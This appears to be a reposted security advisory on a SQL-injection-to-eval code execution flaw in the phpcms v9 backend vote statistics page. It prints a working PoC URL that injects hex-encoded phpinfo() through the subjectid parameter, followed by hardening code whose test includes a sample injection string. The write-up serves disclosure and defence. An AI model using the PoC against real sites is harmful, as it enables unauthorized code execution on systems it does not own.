Phpcms v9 backend SQL injection to code execution vulnerability
By flyh4t www.2cto.com
In phpcms v9 the string2array() helper hands its argument straight to eval(), so every call site that passes attacker-influenced data into it becomes a potential code execution point.
function string2array($data) {
    if ($data == '') return array();
    eval("\$array = $data;"); // the stored string is executed as PHP
    return $array;
}
One example is the vote result statistics action (backend privileges required):
/modules/vote.php
/**
 * Vote result statistics
 */
public function statistics() {
    $subjectid = $_GET['subjectid'];
    $show_validator = $show_scroll = $show_header = true;
    // Fetch the voting information
    $sdb = pc_base::load_model('vote_data_model'); // load the vote statistics data model
    $infos = $sdb->select("subjectid = $subjectid", 'data'); // $subjectid is not filtered
    // Create an array to store the new combined data
    $total = 0;
    $vote_data = array();
    $vote_data['total'] = 0; // total number of all voting options
    $vote_data['votes'] = 0; // number of votes
    // Loop over each member's voting records
    foreach ($infos as $subjectid_arr) { // result set controlled through the SQL injection
        extract($subjectid_arr);
        $arr = string2array($data); // the 'data' column reaches eval()
        foreach ($arr as $key => $values) {
            $vote_data[$key] += 1;
        }
        $total += array_sum($arr);
        $vote_data['votes']++;
    }
    $vote_data['total'] = $total;
    // Select the voting options
    $options = $this->db2->get_options($subjectid);
    include $this->admin_tpl('vote_statistics');
}
PoC
index.php?m=vote&c=vote&a=statistics&show_type=1&subjectid=0 union select 0x706870696E666F2829/*&siteid=1&pc_hash=LFeCIl
pc_hash is different on each request.
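As an added hardening example (this is not phpcms's own code; the names string2array_safe, require_positive_int and tally_votes are hypothetical, and storing the vote data as JSON is an assumption, since phpcms v9 stores PHP array literals), the following closes both weak points described above: subjectid is validated before it can be interpolated into the WHERE clause, and the stored vote data is decoded and type-checked without eval(), so a row that does not look like a flat map of option id to count is dropped instead of executed.

```php
<?php
// Added hardening example, not phpcms code. Replaces the two weak points in
// statistics(): the unfiltered $subjectid and the eval() in string2array().

// 1. Decode stored vote data without eval(). Assumes the rows are stored as
//    JSON (an assumption; phpcms v9 stores PHP array literals). Only a flat
//    map of numeric option id => non-negative integer count is accepted.
function string2array_safe(string $data): array {
    if ($data === '') {
        return array();
    }
    $decoded = json_decode($data, true);
    if (!is_array($decoded)) {
        return array(); // not JSON or not an array: treat as no votes
    }
    $clean = array();
    foreach ($decoded as $key => $value) {
        if (!preg_match('/^[0-9]+$/', (string)$key) || !is_int($value) || $value < 0) {
            return array(); // any unexpected key or value rejects the whole row
        }
        $clean[(int)$key] = $value;
    }
    return $clean;
}

// 2. Validate the identifier before it reaches the query text. Anything that
//    is not a plain positive integer is refused, so no SQL fragment supplied
//    through subjectid can become part of the WHERE clause.
function require_positive_int(string $raw): int {
    if (!preg_match('/^[1-9][0-9]*$/', $raw)) {
        throw new InvalidArgumentException('subjectid must be a positive integer');
    }
    return (int)$raw;
}

// 3. Tally rows the way statistics() does, but over safely decoded data.
//    $rows stands in for the result of the 'data' column select.
function tally_votes(array $rows): array {
    $vote_data = array('total' => 0, 'votes' => 0);
    foreach ($rows as $row) {
        $arr = string2array_safe($row['data']);
        if ($arr === array()) {
            continue; // rejected or empty row: skipped, never evaluated
        }
        foreach ($arr as $key => $count) {
            $vote_data[$key] = ($vote_data[$key] ?? 0) + 1;
        }
        $vote_data['total'] += array_sum($arr);
        $vote_data['votes']++;
    }
    return $vote_data;
}

// Constructed sample rows: two legitimate ballots plus two tampered rows of
// the kind the original string2array() would have handed to eval().
$rows = array(
    array('data' => '{"1":1,"3":1}'),
    array('data' => '{"2":1}'),
    array('data' => 'not_an_array_literal()'), // rejected: not JSON
    array('data' => '{"1":"x"}'),              // rejected: non-integer count
);

var_dump(require_positive_int('5'));
try {
    require_positive_int('0 union select 1'); // constructed bad input
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";               // rejected before any SQL is built
}
print_r(tally_votes($rows));
```

Casting or pattern-checking the id is the practical fix here because the model's select() takes a raw condition string; where the data layer supports it, binding subjectid as a query parameter is the more general control. Either way the eval() removal matters on its own, since any other path that writes to the data column (a second injection point, a compromised database account) would otherwise still yield code execution.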